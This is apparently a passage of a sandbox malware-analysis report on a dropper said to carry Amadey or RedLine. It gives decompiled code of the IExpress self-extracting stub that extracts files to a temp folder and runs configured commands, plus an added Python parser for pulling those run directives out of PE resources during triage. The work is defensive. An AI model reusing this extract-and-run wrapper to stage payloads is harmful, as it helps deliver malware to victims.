                                                                                                                                                                                                                                    												LocalFree(_t151);
                                                                                                                                                                                                                                    												_t127 = _t127 + 1;
                                                                                                                                                                                                                                    												_v396 = _t127;
                                                                                                                                                                                                                                    												__eflags = _t127 - 2;
                                                                                                                                                                                                                                    												if(_t127 >= 2) {
                                                                                                                                                                                                                                    													_t155 = 1;
													__eflags = 1;
													L69:
													__eflags =  *0x408580;
													if( *0x408580 != 0) {
														E00402267();
													}
													_t77 = _t155;
													goto L63;
												}
												_t153 = _v392;
												_t149 = _v388;
												continue;
											}
											L38:
											__eflags =  *0x408180;
											if( *0x408180 == 0) {
												_t146 = 0x4c7;
												E004044B9(0, 0x4c7, 0, 0, 0x10, 0);
												LocalFree(_v424);
												 *0x409124 = 0x8007042b;
												goto L62;
											}
											__eflags = _t157;
											if(_t157 == 0) {
												goto L57;
											}
											__eflags =  *0x409a34 & 0x00000004;
											if(__eflags == 0) {
												goto L57;
											}
											_t129 = E00406495(_t127, _t132, _t157, __eflags);
											__eflags = _t129;
											if(_t129 == 0) {
												_t146 = 0x4c8;
												E004044B9(0, 0x4c8, "advpack.dll", 0, 0x10, 0);
												L65:
												LocalFree(_v408);
												 *0x409124 = E00406285();
												goto L62;
											}
											_t146 = GetProcAddress(_t129, "DoInfInstall");
											_v404 = _t146;
											__eflags = _t146;
											if(_t146 == 0) {
												_t146 = 0x4c9;
												__eflags = 0;
												E004044B9(0, 0x4c9, "DoInfInstall", 0, 0x10, 0);
												FreeLibrary(_t129);
												goto L65;
											}
											__eflags =  *0x408a30;
											_t151 = _v408;
											_v384 = 0;
											_v368 =  &_v280;
											_t96 =  *0x409a40; // 0x3
											_v364 = _t96;
											_t97 =  *0x408a38 & 0x0000ffff;
											_v380 = 0x409154;
											_v376 = _t151;
											_v372 = 0x4091e4;
											_v360 = _t97;
											if( *0x408a30 != 0) {
												_t97 = _t97 | 0x00010000;
												__eflags = _t97;
												_v360 = _t97;
											}
											_t144 =  *0x409a34; // 0x1
											__eflags = _t144 & 0x00000008;
											if((_t144 & 0x00000008) != 0) {
												_t97 = _t97 | 0x00020000;
												__eflags = _t97;
												_v360 = _t97;
											}
											__eflags = _t144 & 0x00000010;
											if((_t144 & 0x00000010) != 0) {
												_t97 = _t97 | 0x00040000;
												__eflags = _t97;
												_v360 = _t97;
											}
											_t145 =  *0x408d48; // 0x0
											__eflags = _t145 & 0x00000040;
											if((_t145 & 0x00000040) != 0) {
												_t97 = _t97 | 0x00080000;
												__eflags = _t97;
												_v360 = _t97;
											}
											__eflags = _t145;
											if(_t145 < 0) {
												_t104 = _t97 | 0x00100000;
												__eflags = _t104;
												_v360 = _t104;
											}
											_t98 =  *0x409a38; // 0x0
											_v356 = _t98;
											_t130 = _t146;
											 *0x40a288( &_v384);
											_t101 = _v404();
											__eflags = _t164 - _t164;
											if(_t164 != _t164) {
												_t130 = 4;
												asm("int 0x29");
											}
											 *0x409124 = _t101;
											_push(_t129);
											__eflags = _t101;
											if(_t101 < 0) {
												FreeLibrary();
												goto L61;
											} else {
												FreeLibrary();
												_t127 = _v400;
												goto L58;
											}
										}
										__eflags =  *0x409a40 - 1; // 0x3
										if(__eflags == 0) {
											goto L37;
										}
										__eflags =  *0x408a20;
										if( *0x408a20 == 0) {
											goto L37;
										}
										__eflags = _t157;
										if(_t157 != 0) {
											goto L38;
										}
										_v388 = 1;
										E0040202A(_t146); // executed
										goto L37;
									}
									_t146 =  &_v280;
									_t108 = E0040468F("POSTRUNPROGRAM",  &_v280, 0x104);
									__eflags = _t108;
									if(_t108 == 0) {
										goto L25;
									}
									__eflags =  *0x408c42;
									if( *0x408c42 != 0) {
										goto L69;
									}
									_t112 = CompareStringA(0x7f, 1,  &_v280, 0xffffffff, "<None>", 0xffffffff);
                                                                                                                                                                                                                                    									__eflags = _t112 == 0;
                                                                                                                                                                                                                                    									if(_t112 == 0) {
                                                                                                                                                                                                                                    										goto L69;
                                                                                                                                                                                                                                    									}
                                                                                                                                                                                                                                    									goto L31;
                                                                                                                                                                                                                                    								}
                                                                                                                                                                                                                                    								_t118 =  *0x408a38; // 0x0
                                                                                                                                                                                                                                    								if(_t118 == 0) {
                                                                                                                                                                                                                                    									L23:
                                                                                                                                                                                                                                    									if(_t153 != 0) {
                                                                                                                                                                                                                                    										goto L31;
                                                                                                                                                                                                                                    									}
                                                                                                                                                                                                                                    									_t146 =  &_v276;
                                                                                                                                                                                                                                    									if(E0040468F("RUNPROGRAM",  &_v276, 0x104) != 0) {
                                                                                                                                                                                                                                    										goto L27;
                                                                                                                                                                                                                                    									}
                                                                                                                                                                                                                                    									goto L25;
                                                                                                                                                                                                                                    								}
                                                                                                                                                                                                                                    								if((_t118 & 0x00000001) == 0) {
                                                                                                                                                                                                                                    									__eflags = _t118 & 0x00000002;
                                                                                                                                                                                                                                    									if((_t118 & 0x00000002) == 0) {
                                                                                                                                                                                                                                    										goto L62;
                                                                                                                                                                                                                                    									}
                                                                                                                                                                                                                                    									_t140 = "USRQCMD";
                                                                                                                                                                                                                                    									L20:
                                                                                                                                                                                                                                    									_t146 =  &_v276;
                                                                                                                                                                                                                                    									if(E0040468F(_t140,  &_v276, 0x104) == 0) {
                                                                                                                                                                                                                                    										goto L25;
                                                                                                                                                                                                                                    									}
                                                                                                                                                                                                                                    									if(CompareStringA(0x7f, 1,  &_v276, 0xffffffff, "<None>", 0xffffffff) - 2 != 0xfffffffe) {
                                                                                                                                                                                                                                    										_t153 = 1;
                                                                                                                                                                                                                                    										_v388 = 1;
                                                                                                                                                                                                                                    									}
                                                                                                                                                                                                                                    									goto L23;
                                                                                                                                                                                                                                    								}
                                                                                                                                                                                                                                    								_t140 = "ADMQCMD";
                                                                                                                                                                                                                                    								goto L20;
                                                                                                                                                                                                                                    							}
                                                                                                                                                                                                                                    						}
                                                                                                                                                                                                                                    						L26:
                                                                                                                                                                                                                                    						_push(_t130);
                                                                                                                                                                                                                                    						_t146 = 0x104;
                                                                                                                                                                                                                                    						E00401781( &_v276, 0x104, _t130, 0x408c42);
                                                                                                                                                                                                                                    						goto L27;
                                                                                                                                                                                                                                    					}
                                                                                                                                                                                                                                    				}
                                                                                                                                                                                                                                    				_t130 = "REBOOT";
                                                                                                                                                                                                                                    				_t125 = E0040468F(_t130, 0x409a2c, 4);
                                                                                                                                                                                                                                    				if(_t125 == 0 || _t125 > 4) {
                                                                                                                                                                                                                                    					goto L25;
                                                                                                                                                                                                                                    				} else {
                                                                                                                                                                                                                                    					goto L3;
                                                                                                                                                                                                                                    				}
                                                                                                                                                                                                                                    			}
                                                                                                                                                                                                                                    0x00403f15
                                                                                                                                                                                                                                    0x00403f1a
                                                                                                                                                                                                                                    0x00403f1c
                                                                                                                                                                                                                                    0x00403f46
                                                                                                                                                                                                                                    0x00403f47
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00403f47
                                                                                                                                                                                                                                    0x00403f1e
                                                                                                                                                                                                                                    0x00403f1f
                                                                                                                                                                                                                                    0x00403f25
                                                                                                                                                                                                                                    0x00403f26
                                                                                                                                                                                                                                    0x00403f2a
                                                                                                                                                                                                                                    0x00403f2d
                                                                                                                                                                                                                                    0x00403fd9
                                                                                                                                                                                                                                    0x00403fd9
                                                                                                                                                                                                                                    0x00403fda
                                                                                                                                                                                                                                    0x00403fda
                                                                                                                                                                                                                                    0x00403fe1
                                                                                                                                                                                                                                    0x00403fe3
                                                                                                                                                                                                                                    0x00403fe3
                                                                                                                                                                                                                                    0x00403fe8
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00403fe8
                                                                                                                                                                                                                                    0x00403f33
                                                                                                                                                                                                                                    0x00403f37
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00403f37
                                                                                                                                                                                                                                    0x00403dee
                                                                                                                                                                                                                                    0x00403dee
                                                                                                                                                                                                                                    0x00403df5
                                                                                                                                                                                                                                    0x00403fad
                                                                                                                                                                                                                                    0x00403fb9
                                                                                                                                                                                                                                    0x00403fc2
                                                                                                                                                                                                                                    0x00403fc8
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00403fc8
                                                                                                                                                                                                                                    0x00403dfb
                                                                                                                                                                                                                                    0x00403dfd
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00403e03
                                                                                                                                                                                                                                    0x00403e0a
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00403e15
                                                                                                                                                                                                                                    0x00403e17
                                                                                                                                                                                                                                    0x00403e19
                                                                                                                                                                                                                                    0x00403f94
                                                                                                                                                                                                                                    0x00403fa4
                                                                                                                                                                                                                                    0x00403f7c
                                                                                                                                                                                                                                    0x00403f80
                                                                                                                                                                                                                                    0x00403f8b
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00403f8b
                                                                                                                                                                                                                                    0x00403e2c
                                                                                                                                                                                                                                    0x00403e30
                                                                                                                                                                                                                                    0x00403e34
                                                                                                                                                                                                                                    0x00403e36
                                                                                                                                                                                                                                    0x00403f69
                                                                                                                                                                                                                                    0x00403f6e
                                                                                                                                                                                                                                    0x00403f70
                                                                                                                                                                                                                                    0x00403f76
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00403f76
                                                                                                                                                                                                                                    0x00403e3c
                                                                                                                                                                                                                                    0x00403e43
                                                                                                                                                                                                                                    0x00403e47
                                                                                                                                                                                                                                    0x00403e52
                                                                                                                                                                                                                                    0x00403e56
                                                                                                                                                                                                                                    0x00403e5c
                                                                                                                                                                                                                                    0x00403e61
                                                                                                                                                                                                                                    0x00403e68
                                                                                                                                                                                                                                    0x00403e70
                                                                                                                                                                                                                                    0x00403e74
                                                                                                                                                                                                                                    0x00403e7c
                                                                                                                                                                                                                                    0x00403e80
                                                                                                                                                                                                                                    0x00403e82
                                                                                                                                                                                                                                    0x00403e82
                                                                                                                                                                                                                                    0x00403e87
                                                                                                                                                                                                                                    0x00403e87
                                                                                                                                                                                                                                    0x00403e8b
                                                                                                                                                                                                                                    0x00403e91
                                                                                                                                                                                                                                    0x00403e94
                                                                                                                                                                                                                                    0x00403e96
                                                                                                                                                                                                                                    0x00403e96
                                                                                                                                                                                                                                    0x00403e9b
                                                                                                                                                                                                                                    0x00403e9b
                                                                                                                                                                                                                                    0x00403e9f
                                                                                                                                                                                                                                    0x00403ea2
                                                                                                                                                                                                                                    0x00403ea4
                                                                                                                                                                                                                                    0x00403ea4
                                                                                                                                                                                                                                    0x00403ea9
                                                                                                                                                                                                                                    0x00403ea9
                                                                                                                                                                                                                                    0x00403ead
                                                                                                                                                                                                                                    0x00403eb3
                                                                                                                                                                                                                                    0x00403eb6
                                                                                                                                                                                                                                    0x00403eb8
                                                                                                                                                                                                                                    0x00403eb8
                                                                                                                                                                                                                                    0x00403ebd
                                                                                                                                                                                                                                    0x00403ebd
                                                                                                                                                                                                                                    0x00403ec1
                                                                                                                                                                                                                                    0x00403ec3
                                                                                                                                                                                                                                    0x00403ec5
                                                                                                                                                                                                                                    0x00403ec5
                                                                                                                                                                                                                                    0x00403eca
                                                                                                                                                                                                                                    0x00403eca
                                                                                                                                                                                                                                    0x00403ece
                                                                                                                                                                                                                                    0x00403ed5
                                                                                                                                                                                                                                    0x00403ed9
                                                                                                                                                                                                                                    0x00403ee0
                                                                                                                                                                                                                                    0x00403ee6
                                                                                                                                                                                                                                    0x00403eea
                                                                                                                                                                                                                                    0x00403eec
                                                                                                                                                                                                                                    0x00403eee
                                                                                                                                                                                                                                    0x00403ef3
                                                                                                                                                                                                                                    0x00403ef3

APIs
• memset.MSVCRT ref: 00403C11
• CompareStringA.KERNEL32(0000007F,00000001,?,000000FF,<None>,000000FF,00000104,00000004), ref: 00403CDC
  • Part of subcall function 0040468F: FindResourceA.KERNEL32(00000000,TITLE,0000000A), ref: 004046A0
  • Part of subcall function 0040468F: SizeofResource.KERNEL32(00000000,00000000,?,00402D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 004046A9
  • Part of subcall function 0040468F: FindResourceA.KERNEL32(00000000,TITLE,0000000A), ref: 004046C3
  • Part of subcall function 0040468F: LoadResource.KERNEL32(00000000,00000000,?,00402D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 004046CC
  • Part of subcall function 0040468F: LockResource.KERNEL32(00000000,?,00402D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 004046D3
  • Part of subcall function 0040468F: memcpy_s.MSVCRT ref: 004046E5
  • Part of subcall function 0040468F: FreeResource.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,00000002,00000000), ref: 004046EF
• CompareStringA.KERNEL32(0000007F,00000001,?,000000FF,<None>,000000FF,00000104,?,00408C42), ref: 00403D8F
• GetProcAddress.KERNEL32(00000000,DoInfInstall), ref: 00403E26
• FreeLibrary.KERNEL32(00000000,?,00408C42), ref: 00403EFF
• LocalFree.KERNEL32(?,?,?,?,00408C42), ref: 00403F1F
• FreeLibrary.KERNEL32(00000000,?,00408C42), ref: 00403F40
• LocalFree.KERNEL32(?,?,?,?,00408C42), ref: 00403F47
• FreeLibrary.KERNEL32(00000000,DoInfInstall,00000000,00000010,00000000,?,00408C42), ref: 00403F76
• LocalFree.KERNEL32(?,advpack.dll,00000000,00000010,00000000,?,?,?,00408C42), ref: 00403F80
• LocalFree.KERNEL32(?,00000000,00000000,00000010,00000000,?,?,?,00408C42), ref: 00403FC2
Strings
Memory Dump Source
• Source File: 00000000.00000002.446310125.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.446310125.000000000040C000.00000040.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_szDGo5lHdI.jbxd
Similarity
• API ID: Free$Resource$Local$Library$CompareFindString$AddressLoadLockProcSizeofmemcpy_smemset
• String ID: <None>$ADMQCMD$C:\Users\user\AppData\Local\Temp\IXP000.TMP\$D$DoInfInstall$POSTRUNPROGRAM$REBOOT$RUNPROGRAM$SHOWWINDOW$USRQCMD$advpack.dll$doza2
• API String ID: 1032054927-2941528158
• Opcode ID: 0a34870bfc71a7d66ef00e24bd5cf700ac72abaeedef1083e1b531c7b89e28e4
• Instruction ID: 4eb6e881215b4124141a09aa4552a99e739b7383a09d60a45f4522afb61a9575
• Opcode Fuzzy Hash: 0a34870bfc71a7d66ef00e24bd5cf700ac72abaeedef1083e1b531c7b89e28e4
• Instruction Fuzzy Hash: C0B1B4706083019BE720DF248945B6B7AE8AB84715F10493FFA85F62E1D77C8D45CB5E
Uniqueness
• Uniqueness Score: -1.00%

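Triage note on the function above: its API and string profile (FindResourceA(…, "TITLE", 0xA) with 0xA being RT_RCDATA, CompareStringA against RUNPROGRAM / POSTRUNPROGRAM / ADMQCMD / USRQCMD / SHOWWINDOW / REBOOT, the extraction directory %TEMP%\IXP000.TMP, and advpack.dll!DoInfInstall resolved through GetProcAddress) is that of the Microsoft IExpress self-extracting stub (wextract). This is the wrapper's extract-and-run logic, not the Amadey or RedLine payload itself; what matters for triage is which commands the RUNPROGRAM and POSTRUNPROGRAM directives carry, because the stub stores them as named RT_RCDATA resources and executes them after extraction. The following is an added, stdlib-only example that walks a PE's resource tree and pulls those directives out; it is not code from the report or from the sample. It assumes the directives are stored as NUL-terminated ANSI text (consistent with the A-suffixed APIs above), and the `build_test_stub` helper builds a constructed, hypothetical PE so the parser can be exercised offline: it is not the analysed file and its commands are invented.

```python
import struct

RT_RCDATA = 10
# Directive names visible in the function's string list above.
IEXPRESS_DIRECTIVES = ("TITLE", "RUNPROGRAM", "POSTRUNPROGRAM", "ADMQCMD",
                       "USRQCMD", "SHOWWINDOW", "REBOOT")


def _u16(b, o): return struct.unpack_from("<H", b, o)[0]
def _u32(b, o): return struct.unpack_from("<I", b, o)[0]


def walk_resources(rsrc, rsrc_rva, base=0, path=()):
    """Yield (path, data) for every leaf of a PE resource tree.

    rsrc is the raw .rsrc section and rsrc_rva its RVA: leaf OffsetToData fields
    are RVAs, not section offsets. path collects (type, name, lang) from the root.
    """
    n_named, n_id = _u16(rsrc, base + 12), _u16(rsrc, base + 14)
    for i in range(n_named + n_id):
        e = base + 16 + 8 * i
        name, off = _u32(rsrc, e), _u32(rsrc, e + 4)
        if name & 0x80000000:  # IMAGE_RESOURCE_DIR_STRING_U: u16 length + UTF-16LE chars
            s = name & 0x7FFFFFFF
            key = rsrc[s + 2:s + 2 + 2 * _u16(rsrc, s)].decode("utf-16-le")
        else:
            key = name
        if off & 0x80000000:   # subdirectory
            yield from walk_resources(rsrc, rsrc_rva, off & 0x7FFFFFFF, path + (key,))
        else:                  # IMAGE_RESOURCE_DATA_ENTRY: OffsetToData, Size, CodePage, Reserved
            rva, size = _u32(rsrc, off), _u32(rsrc, off + 4)
            yield path + (key,), rsrc[rva - rsrc_rva:rva - rsrc_rva + size]


def resource_section(pe):
    """Locate .rsrc through the resource data directory; returns (bytes, rva) or None."""
    if pe[:2] != b"MZ":
        return None
    nt = _u32(pe, 0x3C)
    if pe[nt:nt + 4] != b"PE\0\0":
        return None
    nsec, opt = _u16(pe, nt + 6), nt + 24
    dd = opt + (96 if _u16(pe, opt) == 0x10B else 112)  # PE32 vs PE32+ data directories
    res_rva = _u32(pe, dd + 2 * 8)                       # entry 2 = IMAGE_DIRECTORY_ENTRY_RESOURCE
    sect = opt + _u16(pe, nt + 20)                       # section table follows the optional header
    for i in range(nsec):
        s = sect + 40 * i
        vsize, va = _u32(pe, s + 8), _u32(pe, s + 12)
        rawsz, raw = _u32(pe, s + 16), _u32(pe, s + 20)
        if va <= res_rva < va + max(vsize, rawsz):
            return pe[raw:raw + rawsz], va
    return None


def iexpress_directives(pe):
    """Map directive name -> command for every IExpress directive present in pe.

    Assumption: each directive is a NUL-terminated ANSI string in an RT_RCDATA
    resource named after the directive, as the stub's FindResourceA call implies.
    """
    sec = resource_section(pe)
    if sec is None:
        return {}
    rsrc, rva = sec
    found = {}
    for path, data in walk_resources(rsrc, rva):
        if len(path) == 3 and path[0] == RT_RCDATA and path[1] in IEXPRESS_DIRECTIVES:
            found[path[1]] = data.split(b"\0", 1)[0].decode("latin-1")
    return found


def build_test_stub(directives):
    """Constructed input (hypothetical, not the analysed sample): a minimal PE32 whose
    only section is .rsrc, holding one named RT_RCDATA resource per directive."""
    rsrc_rva, names = 0x1000, list(directives)
    n = len(names)
    type_off = 24                     # root dir (16) + one id entry (8)
    namedir0 = type_off + 16 + 8 * n  # one name dir per directive, 24 bytes each
    data0 = namedir0 + 24 * n         # IMAGE_RESOURCE_DATA_ENTRY, 16 bytes each
    str0 = data0 + 16 * n             # name strings, then the directive text
    strs, entries, blob = bytearray(), bytearray(), bytearray()
    for i, nm in enumerate(names):
        entries += struct.pack("<II", 0x80000000 | (str0 + len(strs)), 0x80000000 | (namedir0 + 24 * i))
        strs += struct.pack("<H", len(nm)) + nm.encode("utf-16-le")
    buf = struct.pack("<IIHHHH", 0, 0, 0, 0, 0, 1) + struct.pack("<II", RT_RCDATA, 0x80000000 | type_off)
    buf += struct.pack("<IIHHHH", 0, 0, 0, 0, n, 0) + entries
    for i in range(n):  # each name dir holds a single language (0x409) leaf
        buf += struct.pack("<IIHHHH", 0, 0, 0, 0, 0, 1) + struct.pack("<II", 0x409, data0 + 16 * i)
    text0 = str0 + len(strs)
    for nm in names:
        val = directives[nm].encode("latin-1") + b"\0"
        buf += struct.pack("<IIII", rsrc_rva + text0 + len(blob), len(val), 0, 0)
        blob += val
    rsrc = buf + bytes(strs) + bytes(blob)
    opt = bytearray(224)
    struct.pack_into("<H", opt, 0, 0x10B)                           # PE32 magic
    struct.pack_into("<II", opt, 96 + 2 * 8, rsrc_rva, len(rsrc))  # resource data directory
    coff = struct.pack("<HHIIIHH", 0x14C, 1, 0, 0, 0, len(opt), 0x102)
    sect = b".rsrc\0\0\0" + struct.pack("<IIIIIIHHI", len(rsrc), rsrc_rva, len(rsrc), 0x200, 0, 0, 0, 0, 0x40000040)
    dos = b"MZ" + b"\0" * 58 + struct.pack("<I", 0x40)             # e_lfanew = 0x40
    return (dos + b"PE\0\0" + coff + bytes(opt) + sect).ljust(0x200, b"\0") + rsrc
```

Run `iexpress_directives(open(path, "rb").read())` against the submitted executable or the unpacked dump to see what the stub launches; an empty result on a file that does show the IXP000.TMP behaviour means the directives are not stored the way this parser assumes and should be checked by hand with a resource viewer.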
Control-flow Graph (legend: Executed / Not Executed)

control_flow_graph 141 401ae8-401b2c call 401680 144 401b3b-401b40 141->144 145 401b2e-401b39 141->145 146 401b46-401b61 call 401a84 144->146 145->146 149 401b63-401b65 146->149 150 401b9f-401bc2 call 401781 call 40658a 146->150 152 401b68-401b6d 149->152 157 401bc7-401bd3 call 4066c8 150->157 152->152 154 401b6f-401b74 152->154 154->150 156 401b76-401b7b 154->156 158 401b83-401b86 156->158 159 401b7d-401b81 156->159 166 401d73-401d7f call 4066c8 157->166 167 401bd9-401bf1 CompareStringA 157->167 158->150 162 401b88-401b8a 158->162 159->158 161 401b8c-401b9d call 401680 159->161 161->157 162->150 162->161 175 401d81-401d99 CompareStringA 166->175 176 401df8-401e09 LocalAlloc 166->176 167->166 168 401bf7-401c07 GetFileAttributesA 167->168 170 401d53-401d5e 168->170 171 401c0d-401c15 168->171 173 401d64-401d6e call 4044b9 170->173 171->170 174 401c1b-401c33 call 401a84 171->174 191 401e94-401ea4 call 406ce0 173->191 187 401c50-401c61 LocalAlloc 174->187 188 401c35-401c38 174->188 175->176 181 401d9b-401da2 175->181 178 401dd4-401ddf 176->178 179 401e0b-401e1b GetFileAttributesA 176->179 178->173 184 401e67-401e73 call 401680 179->184 185 401e1d-401e1f 179->185 182 401da5-401daa 181->182 182->182 189 401dac-401db4 182->189 197 401e78-401e84 call 402aac 184->197 185->184 192 401e21-401e3e call 401781 185->192 187->178 196 401c67-401c72 187->196 193 401c40-401c4b call 401a84 188->193 194 401c3a 188->194 195 401db7-401dbc 189->195 192->197 211 401e40-401e43 192->211 193->187 194->193 195->195 201 401dbe-401dd2 LocalAlloc 195->201 202 401c74 196->202 203 401c79-401cc0 GetPrivateProfileIntA GetPrivateProfileStringA 196->203 210 401e89-401e92 197->210 201->178 207 401de1-401df3 call 40171e 201->207 202->203 208 401cc2-401ccc 203->208 209 401cf8-401d07 203->209 207->210 215 401cd3-401cf3 call 401680 * 2 208->215 216 401cce 208->216 212 401d23 209->212 213 401d09-401d21 GetShortPathNameA 209->213 210->191 211->197 217 401e45-401e65 call 4016b3 * 2 211->217 219 401d28-401d2b 212->219 213->219 215->210 216->215 217->197 223 401d32-401d4e call 40171e 219->223 224 401d2d 219->224 223->210 224->223
                                                                                                                                                                                                                                    C-Code - Quality: 82%
E00401AE8(long __ecx, CHAR** _a4, int* _a8) {
	signed int _v8;
	char _v268;
	char _v527;
	char _v528;
	char _v1552;
	CHAR* _v1556;
	int* _v1560;
	CHAR** _v1564;
	void* __ebx;
	void* __edi;
	void* __esi;
	signed int _t48;
	CHAR* _t53;
	CHAR* _t54;
	char* _t57;
	char* _t58;
	CHAR* _t60;
	void* _t62;
	signed char _t65;
	intOrPtr _t76;
	intOrPtr _t77;
	unsigned int _t85;
	CHAR* _t90;
	CHAR* _t92;
	char _t105;
	char _t106;
	CHAR** _t111;
	CHAR* _t115;
	intOrPtr* _t125;
	void* _t126;
	CHAR* _t132;
	CHAR* _t135;
	void* _t138;
	void* _t139;
	void* _t145;
	intOrPtr* _t146;
	char* _t148;
	CHAR* _t151;
	void* _t152;
	CHAR* _t155;
	CHAR* _t156;
	void* _t157;
	signed int _t158;

	_t48 =  *0x408004; // 0x8f135e3b
	_v8 = _t48 ^ _t158;
	_t108 = __ecx;
	_v1564 = _a4;
	_v1560 = _a8;
	E00401680( &_v528, 0x104, __ecx);
	if(_v528 != 0x22) {
		_t135 = " ";
		_t53 =  &_v528;
	} else {
		_t135 = "\"";
		_t53 =  &_v527;
	}
	_t111 =  &_v1556;
	_v1556 = _t53;
	_t54 = E00401A84(_t111, _t135);
	_t156 = _v1556;
	_t151 = _t54;
	if(_t156 == 0) {
		L12:
		_push(_t111);
		E00401781( &_v268, 0x104, _t111, "C:\Users\hardz\AppData\Local\Temp\IXP000.TMP\");
		E0040658A( &_v268, 0x104, _t156);
		goto L13;
	} else {
		_t132 = _t156;
		_t148 =  &(_t132[1]);
		do {
			_t105 =  *_t132;
			_t132 =  &(_t132[1]);
		} while (_t105 != 0);
		_t111 = _t132 - _t148;
		if(_t111 < 3) {
			goto L12;
		}
		_t106 = _t156[1];
		if(_t106 != 0x3a || _t156[2] != 0x5c) {
			if( *_t156 != 0x5c || _t106 != 0x5c) {
				goto L12;
			} else {
				goto L11;
			}
		} else {
			L11:
			E00401680( &_v268, 0x104, _t156);
			L13:
			_t138 = 0x2e;
			_t57 = E004066C8(_t156, _t138);
			if(_t57 == 0 || CompareStringA(0x7f, 1, _t57, 0xffffffff, ".INF", 0xffffffff) != 0) {
				_t139 = 0x2e;
				_t115 = _t156;
				_t58 = E004066C8(_t115, _t139);
				if(_t58 == 0 || CompareStringA(0x7f, 1, _t58, 0xffffffff, ".BAT", 0xffffffff) != 0) {
					_t156 = LocalAlloc(0x40, 0x400);
					if(_t156 == 0) {
						goto L43;
					}
					_t65 = GetFileAttributesA( &_v268); // executed
					if(_t65 == 0xffffffff || (_t65 & 0x00000010) != 0) {
						E00401680( &_v1552, 0x400, _t108);
					} else {
						_push(_t115);
						_t108 = 0x400;
						E00401781( &_v1552, 0x400, _t115,  &_v268);
						if(_t151 != 0 &&  *_t151 != 0) {
							E004016B3( &_v1552, 0x400, " ");
							E004016B3( &_v1552, 0x400, _t151);
						}
					}
					_t140 = _t156;
					 *_t156 = 0;
					E00402AAC( &_v1552, _t156, _t156);
					goto L53;
				} else {
					_t108 = "Command.com /c %s";
					_t125 = "Command.com /c %s";
					_t145 = _t125 + 1;
					do {
						_t76 =  *_t125;
						_t125 = _t125 + 1;
					} while (_t76 != 0);
					_t126 = _t125 - _t145;
					_t146 =  &_v268;
					_t157 = _t146 + 1;
					do {
						_t77 =  *_t146;
						_t146 = _t146 + 1;
					} while (_t77 != 0);
                                                                                                                                                                                                                                    								_t140 = _t146 - _t157;
                                                                                                                                                                                                                                    								_t154 = _t126 + 8 + _t146 - _t157;
                                                                                                                                                                                                                                    								_t156 = LocalAlloc(0x40, _t126 + 8 + _t146 - _t157);
                                                                                                                                                                                                                                    								if(_t156 != 0) {
                                                                                                                                                                                                                                    									E0040171E(_t156, _t154, "Command.com /c %s",  &_v268);
                                                                                                                                                                                                                                    									goto L53;
                                                                                                                                                                                                                                    								}
                                                                                                                                                                                                                                    								goto L43;
                                                                                                                                                                                                                                    							}
                                                                                                                                                                                                                                    						} else {
                                                                                                                                                                                                                                    							_t85 = GetFileAttributesA( &_v268);
                                                                                                                                                                                                                                    							if(_t85 == 0xffffffff || ( !(_t85 >> 4) & 0x00000001) == 0) {
                                                                                                                                                                                                                                    								_t140 = 0x525;
                                                                                                                                                                                                                                    								_push(0);
                                                                                                                                                                                                                                    								_push(0x10);
                                                                                                                                                                                                                                    								_push(0);
                                                                                                                                                                                                                                    								_t60 =  &_v268;
                                                                                                                                                                                                                                    								goto L35;
                                                                                                                                                                                                                                    							} else {
                                                                                                                                                                                                                                    								_t140 = "[";
                                                                                                                                                                                                                                    								_v1556 = _t151;
                                                                                                                                                                                                                                    								_t90 = E00401A84( &_v1556, "[");
                                                                                                                                                                                                                                    								if(_t90 != 0) {
                                                                                                                                                                                                                                    									if( *_t90 != 0) {
                                                                                                                                                                                                                                    										_v1556 = _t90;
                                                                                                                                                                                                                                    									}
                                                                                                                                                                                                                                    									_t140 = "]";
                                                                                                                                                                                                                                    									E00401A84( &_v1556, "]");
                                                                                                                                                                                                                                    								}
                                                                                                                                                                                                                                    								_t156 = LocalAlloc(0x40, 0x200);
                                                                                                                                                                                                                                    								if(_t156 == 0) {
                                                                                                                                                                                                                                    									L43:
                                                                                                                                                                                                                                    									_t60 = 0;
                                                                                                                                                                                                                                    									_t140 = 0x4b5;
                                                                                                                                                                                                                                    									_push(0);
                                                                                                                                                                                                                                    									_push(0x10);
                                                                                                                                                                                                                                    									_push(0);
                                                                                                                                                                                                                                    									L35:
                                                                                                                                                                                                                                    									_push(_t60);
                                                                                                                                                                                                                                    									E004044B9(0, _t140);
                                                                                                                                                                                                                                    									_t62 = 0;
                                                                                                                                                                                                                                    									goto L54;
                                                                                                                                                                                                                                    								} else {
                                                                                                                                                                                                                                    									_t155 = _v1556;
                                                                                                                                                                                                                                    									_t92 = _t155;
                                                                                                                                                                                                                                    									if( *_t155 == 0) {
                                                                                                                                                                                                                                    										_t92 = "DefaultInstall";
                                                                                                                                                                                                                                    									}
                                                                                                                                                                                                                                    									 *0x409120 = GetPrivateProfileIntA(_t92, "Reboot", 0,  &_v268);
                                                                                                                                                                                                                                    									 *_v1560 = 1;
                                                                                                                                                                                                                                    									if(GetPrivateProfileStringA("Version", "AdvancedINF", 0x401140, _t156, 8,  &_v268) == 0) {
                                                                                                                                                                                                                                    										 *0x409a34 =  *0x409a34 & 0xfffffffb;
                                                                                                                                                                                                                                    										if( *0x409a40 != 0) {
                                                                                                                                                                                                                                    											_t108 = "setupapi.dll";
                                                                                                                                                                                                                                    										} else {
                                                                                                                                                                                                                                    											_t108 = "setupx.dll";
                                                                                                                                                                                                                                    											GetShortPathNameA( &_v268,  &_v268, 0x104);
                                                                                                                                                                                                                                    										}
                                                                                                                                                                                                                                    										if( *_t155 == 0) {
